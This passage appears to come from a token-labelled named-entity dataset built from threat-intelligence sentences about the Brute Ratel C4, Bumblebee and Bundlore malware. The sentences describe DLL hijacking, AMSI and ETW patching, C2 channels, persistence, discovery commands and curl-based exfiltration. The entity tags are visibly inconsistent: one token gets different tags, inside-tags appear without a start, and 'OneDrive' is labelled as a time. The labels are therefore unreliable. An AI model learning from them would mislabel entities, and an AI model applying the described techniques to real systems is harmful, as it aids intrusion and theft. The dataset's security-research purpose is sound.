"O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Briba", - "installs", - "a", - "service", - "pointing", - "to", - "a", - "malicious", - "DLL", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "used", - "search", - "order", - "hijacking", - "to", - "load", - "a", - "malicious", - "payload", - "DLL", - "as", - "a", - "dependency", - "to", - "a", - "benign", - "application", - "packaged", - "in", - "the", - "same", - "ISO." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "loaded", - "a", - "malicious", - "DLL", - "by", - "spoofing", - "the", - "name", - "of", - "the", - "legitimate", - "Version.DLL", - "and", - "placing", - "it", - "in", - "the", - "same", - "folder", - "as", - "the", - "digitally-signed", - "Microsoft", - "binary", - "OneDriveUpdater.exe." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "DNS", - "over", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "the", - "ability", - "to", - "upload", - "files", - "from", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "the", - "ability", - "to", - "deobfuscate", - "its", - "payload", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "LDAP", - "queries,", - "`net", - "group", - "\"Domain", - "Admins\"", - "/domain`", - "and", - "`net", - "user", - "/domain`", - "for", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "`net", - "group`", - "for", - "discovery", - "on", - "targeted", - "domains." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "LDAP", - "queries", - "and", - "`nltest", - "/domain_trusts`", - "for", - "domain", - "trust", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "call", - "and", - "dynamically", - "resolve", - "hashed", - "APIs." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "the", - "ability", - "to", - "hide", - "memory", - "artifacts", - "and", - "to", - "patch", - "Event", - "Tracing", - "for", - "Windows", - "(ETW)", - "and", - "the", - "Anti", - "Malware", - "Scan", - "Interface", - "(AMSI)." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "download", - "files", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "decode", - "Kerberos", - "5", - "tickets", - "and", - "convert", - "it", - "to", - "hashcat", - "format", - "for", - "subsequent", - "cracking." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "gained", - "execution", - "through", - "users", - "opening", - "malicious", - "documents." - ], - "ner_tags": [ - "B-Idus", - "I-Tool", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "used", - "Microsoft", - "Word", - "icons", - "to", - "hide", - "malicious", - "LNK", - "files." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Tool", - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "used", - "a", - "payload", - "file", - "named", - "OneDrive.update", - "to", - "appear", - "benign." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "call", - "multiple", - "Windows", - "APIs", - "for", - "execution,", - "to", - "share", - "memory,", - "and", - "defense", - "evasion." - ], - "ner_tags": [ - "B-SamFile", - "I-Tool", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "conduct", - "port", - "scanning", - "against", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "the", - "ability", - "to", - "use", - "TCP", - "for", - "external", - "C2." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "used", - "encrypted", - "payload", - "files", - "and", - "maintains", - "an", - "encrypted", - "configuration", - "structure", - "in", - "memory." - ], - "ner_tags": [ - "B-Idus", - "I-Tool", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "enumerate", - "all", - "processes", - "and", - "locate", - "specific", - "process", - "IDs", - "(PIDs)." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "DNS", - "over", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "used", - "reflective", - "loading", - "to", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "the", - "ability", - "to", - "use", - "RPC", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "has", - "the", - "ability", - "to", - "use", - "SMB", - "to", - "pivot", - "in", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "take", - "screenshots", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "detect", - "EDR", - "userland", - "hooks." - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "create", - "Windows", - "system", - "services", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "I-Tool", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "call", - "`NtDelayExecution`", - "to", - "pause", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "HTTPS", - "and", - "HTTPS", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "legitimate", - "websites", - "for", - "external", - "C2", - "channels", - "including", - "Slack,", - "Discord,", - "and", - "MS", - "Teams." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "cmd.exe", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "WMI", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Brute", - "Ratel", - "C4", - "can", - "use", - "WinRM", - "for", - "pivoting." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "compress", - "data", - "stolen", - "from", - "the", - "Registry", - "and", - "volume", - "shadow", - "copies", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "asynchronous", - "procedure", - "call", - "(APC)", - "injection", - "to", - "execute", - "commands", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "the", - "ability", - "to", - "bypass", - "UAC", - "to", - "deploy", - "post", - "exploitation", - "tools", - "with", - "elevated", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "a", - "COM", - "object", - "to", - "execute", - "queries", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "capture", - "and", - "compress", - "stolen", - "credentials", - "from", - "the", - "Registry", - "and", - "volume", - "shadow", - "copies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "search", - "for", - "tools", - "used", - "in", - "static", - "analysis." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "deobfuscate", - "C2", - "server", - "responses", - "and", - "unpack", - "its", - "code", - "on", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Bumblebee", - "loader", - "can", - "support", - "the", - "`Dij`", - "command", - "which", - "gives", - "it", - "the", - "ability", - "to", - "inject", - "DLLs", - "into", - "the", - "memory", - "of", - "other", - "processes." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "send", - "collected", - "data", - "in", - "JSON", - "format", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "backup", - "C2", - "servers", - "if", - "the", - "primary", - "server", - "fails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "uninstall", - "its", - "loader", - "through", - "the", - "use", - "of", - "a", - "`Sdl`", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "download", - "and", - "execute", - "additional", - "payloads", - "including", - "through", - "the", - "use", - "of", - "a", - "`Dex`", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "relied", - "upon", - "a", - "user", - "opening", - "an", - "ISO", - "file", - "to", - "enable", - "execution", - "of", - "malicious", - "shortcut", - "files", - "and", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "relied", - "upon", - "a", - "user", - "downloading", - "a", - "file", - "from", - "a", - "OneDrive", - "link", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "named", - "component", - "DLLs", - "\"RapportGP.dll\"", - "to", - "match", - "those", - "used", - "by", - "the", - "security", - "company", - "Trusteer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "B-Org" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "multiple", - "Native", - "APIs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "been", - "delivered", - "as", - "password-protected", - "zipped", - "ISO", - "files", - "and", - "used", - "control-flow-flattening", - "to", - "obfuscate", - "the", - "flow", - "of", - "functions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "`odbcconf.exe`", - "to", - "run", - "DLLs", - "on", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "identify", - "processes", - "associated", - "with", - "analytical", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "inject", - "code", - "into", - "multiple", - "processes", - "on", - "infected", - "endpoints." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "check", - "the", - "Registry", - "for", - "specific", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "used", - "`rundll32`", - "for", - "execution", - "of", - "the", - "loader", - "component." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "achieve", - "persistence", - "by", - "copying", - "its", - "DLL", - "to", - "a", - "subdirectory", - "of", - "%APPDATA%", - "and", - "creating", - "a", - "Visual", - "Basic", - "Script", - "that", - "will", - "load", - "the", - "DLL", - "via", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "identify", - "specific", - "analytical", - "tools", - "based", - "on", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "`LoadLibrary`", - "to", - "attempt", - "to", - "execute", - "GdiPlus.dll." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "gained", - "execution", - "through", - "luring", - "users", - "into", - "opening", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "been", - "spread", - "through", - "e-mail", - "campaigns", - "with", - "malicious", - "links." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "the", - "ability", - "to", - "base64", - "encode", - "C2", - "server", - "responses." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "encrypt", - "C2", - "requests", - "and", - "responses", - "with", - "RC4" - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "the", - "ability", - "to", - "search", - "for", - "designated", - "file", - "paths", - "and", - "Registry", - "keys", - "that", - "indicate", - "a", - "virtualized", - "environment", - "from", - "multiple", - "products." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "enumerate", - "the", - "OS", - "version", - "and", - "domain", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "the", - "ability", - "to", - "identify", - "the", - "user", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "the", - "ability", - "to", - "set", - "a", - "hardcoded", - "and", - "randomized", - "sleep", - "interval." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "the", - "ability", - "to", - "perform", - "anti-virtualization", - "checks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "create", - "a", - "Visual", - "Basic", - "script", - "to", - "enable", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "has", - "been", - "downloaded", - "to", - "victim's", - "machines", - "from", - "OneDrive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "`cmd.exe`", - "to", - "drop", - "and", - "run", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bumblebee", - "can", - "use", - "WMI", - "to", - "gather", - "system", - "information", - "and", - "to", - "spawn", - "processes", - "for", - "code", - "injection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "can", - "use", - "AppleScript", - "to", - "inject", - "malicious", - "JavaScript", - "into", - "a", - "browser." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "can", - "install", - "malicious", - "browser", - "extensions", - "that", - "are", - "used", - "to", - "hijack", - "user", - "searches." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "used", - "<code>openssl</code>", - "to", - "decrypt", - "AES", - "encrypted", - "payload", - "data.", - "Bundlore", - "has", - "also", - "used", - "base64", - "and", - "RC4", - "with", - "a", - "hardcoded", - "key", - "to", - "deobfuscate", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "can", - "change", - "browser", - "security", - "settings", - "to", - "enable", - "extensions", - "to", - "be", - "installed.", - "Bundlore", - "uses", - "the", - "<code>pkill", - "cfprefsd</code>", - "command", - "to", - "prevent", - "users", - "from", - "inspecting", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "been", - "spread", - "through", - "malicious", - "advertisements", - "on", - "websites." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "uses", - "the", - "<code>curl", - "-s", - "-L", - "-o</code>", - "command", - "to", - "exfiltrate", - "archived", - "data", - "to", - "a", - "URL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-Way", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "prompts", - "the", - "user", - "for", - "their", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "uses", - "the", - "<code>mktemp</code>", - "utility", - "to", - "make", - "unique", - "file", - "and", - "directory", - "names", - "for", - "payloads,", - "such", - "as", - "<code>TMP_DIR=`mktemp", - "-d", - "-t", - "x</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "can", - "download", - "and", - "execute", - "new", - "versions", - "of", - "itself." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "can", - "execute", - "JavaScript", - "by", - "injecting", - "it", - "into", - "the", - "victim's", - "browser." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "can", - "persist", - "via", - "a", - "LaunchAgent." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Bundlore", - "can", - "persist", - "via", - "a", - "LaunchDaemon." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Bundlore", - "changes", - "the", - "permissions", - "of", - "a", - "payload", - "using", - "the", - "command", - "<code>chmod", - "-R", - "755</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "attempted", - "to", - "get", - "users", - "to", - "execute", - "a", - "malicious", - ".app", - "file", - "that", - "looks", - "like", - "a", - "Flash", - "Player", - "update." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "disguised", - "a", - "malicious", - ".app", - "file", - "as", - "a", - "Flash", - "Player", - "update." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "obfuscated", - "data", - "with", - "base64,", - "AES,", - "RC4,", - "and", - "bz2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "used", - "the", - "<code>ps</code>", - "command", - "to", - "list", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "used", - "Python", - "scripts", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "creates", - "a", - "new", - "key", - "pair", - "with", - "<code>ssh-keygen</code>", - "and", - "drops", - "the", - "newly", - "created", - "user", - "key", - "in", - "<code>authorized_keys</code>", - "to", - "enable", - "remote", - "login." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bundlore", - "has", - "the", - "ability", - "to", - "enumerate", - "what", - "browser", - "is", - "being", - "used", - "as", - "well", - "as", - "version", - "information", - "for", - "Safari." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - 